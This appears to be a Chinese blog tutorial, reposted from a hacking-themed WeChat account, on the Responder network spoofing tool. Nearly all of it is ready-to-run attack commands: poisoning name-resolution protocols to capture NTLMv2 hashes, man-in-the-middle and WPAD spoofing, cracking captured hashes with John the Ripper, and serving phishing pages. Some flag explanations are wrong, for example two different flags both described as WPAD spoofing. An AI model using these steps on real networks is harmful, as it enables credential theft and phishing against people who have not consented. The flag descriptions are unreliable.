用心做分享,只为给您最好的学习教程
如果您觉得文章不错,欢迎持续学习
Responder:强大的网络协议欺骗工具
什么是Responder?
Responder的主要特点
-
多种协议支持:支持NetBIOS、LLMNR、MDNS、NBT-NS等多种协议欺骗。 -
凭据捕获:能够捕获明文和加密的凭据,如NTLM哈希、HTTP凭据等。 -
简单易用:易于配置和使用,适合不同水平的安全从业者。 -
灵活扩展:支持插件机制,能够根据需要扩展功能。 -
实时攻击:能够实时执行攻击并捕获结果,适合渗透测试和安全评估。
安装Responder
步骤 1:准备环境
更新系统
sudo apt update
sudo apt upgrade -y
步骤 2:安装Responder
sudo apt install responder -y
使用Responder进行协议欺骗
示例:捕获凭据
步骤 1:启动Responder
eth0
):sudo responder -I eth0
步骤 2:等待捕获
plaintext复制[+] Listening for events...
[for user: Administrator ] Captured NTLMv2 Hash
示例:配置Responder
步骤 1:编辑配置文件
/etc/responder/Responder.conf
。使用文本编辑器打开并编辑配置文件:sudo nano /etc/responder/Responder.conf
步骤 2:配置选项
plaintext复制[Responder Core]
...
SMB = Off
...
步骤 3:保存并重启Responder
sudo systemctl restart responder
示例:使用Responder进行中间人攻击
步骤 1:启用中间人攻击模式
sudo responder -I eth0 -wrf
-
-w
:启用WPAD代理伪装 -
-r
:启用NBT-NS查询响应 -
-f
:启用WPAD代理伪装
步骤 2:执行中间人攻击
Responder的高级使用
集成John the Ripper破解哈希
步骤 1:安装John the Ripper
sudo apt install john -y
步骤 2:提取捕获的哈希
/usr/share/responder/logs/
目录。提取哈希值并保存到文件:cat /usr/share/responder/logs/NTLMv2-Hashes.txt > captured_hashes.txt
步骤 3:破解哈希
john --wordlist=/usr/share/wordlists/rockyou.txt captured_hashes.txt
使用Responder进行网络钓鱼
步骤 1:启用HTTP插件
Responder.conf
文件,启用HTTP插件:plaintext复制[HTTP Server]
...
Serve-HTML = On
...
步骤 2:配置钓鱼页面
/usr/share/responder/HTTP/
目录中,替换默认页面。步骤 3:启动Responder
sudo responder -I eth0 -r -w -f -H
结语
原文始发于微信公众号(黑客联盟l):揭秘最为知名的黑客工具之一:Responder
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论